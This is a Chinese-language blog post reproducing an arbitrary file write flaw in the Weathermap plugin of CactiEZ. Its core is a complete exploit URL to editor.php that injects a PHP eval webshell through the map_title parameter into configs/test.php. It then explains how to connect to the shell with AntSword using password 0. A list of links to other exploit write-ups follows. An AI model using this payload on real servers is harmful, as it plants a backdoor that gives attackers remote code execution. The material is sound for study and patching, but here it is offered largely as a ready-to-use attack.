CactiEZ weathermap插件任意文件写入
漏洞特征
CactiEZ的登录界面,大多数都会存在weathermap的插件,这样我们就可以尝试该网站是否存在任意文件写入漏洞了
漏洞复现
我们直接在url处进行文件写入命令的操作即可。
/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name
这时候我们访问特点的url即可看见我们的shell
http://**.**.**.**/plugins/weathermap/configs/test.php
这时候我们使用蚁剑去连接,密码是0,即可顺利连接上靶机。
http://**.**.**.**/plugins/weathermap/configs/test.php
CactiEZ weathermap插件任意文件写入相关推荐
- Linux使用445端口,利用enum4linux 445端口+wordpress插件任意文件上传的一次渗透
探测内网80端口发现目标IP 目标使用Apache 2.4.7web服务中间件 使用linux Ubuntu系统 使用御剑扫描了目录 目录扫描到了 对192.168.31.236/wordpr ...
- 【安全狐】CVE-2016-3088_ActiveMQ任意文件写入漏洞
CVE-2016-3088_ActiveMQ任意文件写入漏洞 0x01漏洞背景 ActiveMQ的web控制台分三个应用,admin.api和fileserver,其中admin是管理员页面,api是 ...
- ThinkCMF任意文件写入漏洞----学习记录
ThinkCMF框架任意文件写入漏洞 一.ThinkCMF介绍: ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架.ThinkCMF提出灵活的应用机制,框架自身提供基础的管 ...
- 修复路径穿越、任意文件写入漏洞
修复路径穿越.任意文件写入漏洞 背景 前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞.其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可 ...
- 08 - vulhub - Aria2 任意文件写入漏洞
文章目录 漏洞名称:Aria2 任意文件写入漏洞 漏洞原理 漏洞复现 漏洞利用限制 环境准备 漏洞利用 验证漏洞利用是否成功并反弹 修复建议 漏洞名称:Aria2 任意文件写入漏洞 简介: Aria2 ...
- Aria2任意文件写入漏洞 漏洞复现
Aria2任意文件写入漏洞 by ADummy 0x00利用路线 第三方UI与目标进行通信->搭建http服务器->让目标下载恶意文件->定时任务执行->反弹shell 0 ...
- 锐捷某系统前台任意文件写入漏洞分析
0x00前言 这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路. 0x0 ...
- 致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...
概述腾讯御界高级威胁检测系统近期监测到"致远OA系统上的GetShell漏洞"在网上被频繁利用攻击政企客户. 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传websh ...
- linux调用ocx插件_Wordpress file manager插件任意文件上传
白斩鸡@卫兵实验室 近日,Wordpress 插件file manager被爆出严重0day漏洞,本着技术研究角度,和大家分享.探讨其漏洞原因. 该修复程序已在同一天发布,并且WP File Mana ...
最新文章
- MySQL(三)用正则表达式搜索
- 【C语言】07-预处理指令;-宏定义
- matlab一句一句调试,matlab程序怎样调试和运行
- 中国SaaS死或生之七:死生非大事,利益最相关
- Pycharm远程调试之ssh remote debug(二)
- SharePoint创建登录表单
- 电商产品经理:如何搭建会员管理体系(多图干货)
- VAX 的使用快捷键
- Cocos游戏打包apk
- 关于计算机的CPU的发展历史,计算机CPU的全部发展历史
- c语言中指针用法初级,C语言中各类指针的用法(小结)
- 培养下一个埃隆马斯克?AI+教育可以成为好起点
- html图片文字环绕
- 广义表和二叉树的转换
- 第三方网页应用对接飞书Java版
- 应急管理部启动低温雨雪冰冻天气应急响应
- Ngnix之父突然离职,程序员巅峰一代落幕
- Don't rely on luck.
- 对计算机会计上机课的心得,浅谈高职会计电算化实训课程|会计电算化心得2000字...
- LMS算法的C语言实现
热门文章
- a类计算机房的安全需求,安防知识:弱电机房建设分类及要求
- 《伯恩斯新情绪》压力下情绪控制方法
- 基于SECS协议开发的简明教程(7)
- word --- 如何设置word里的代码格式,使之有底纹的效果
- 双十一广告弹窗问题找到了!金山词霸,原来是你!
- IDEA 返回上一步、下一步 Back ← Forward → 快捷键失效问题解决
- Linux /etc/shadow文件含义
- List、Set、Map的特点及遍历方法
- Swan Song 第十一周Scrum Meeting
- 公安大学c语言真题,2016年中国人民公安大学网络安全与执法C语言程序设计(同等学力加试)复试笔试仿真模拟题...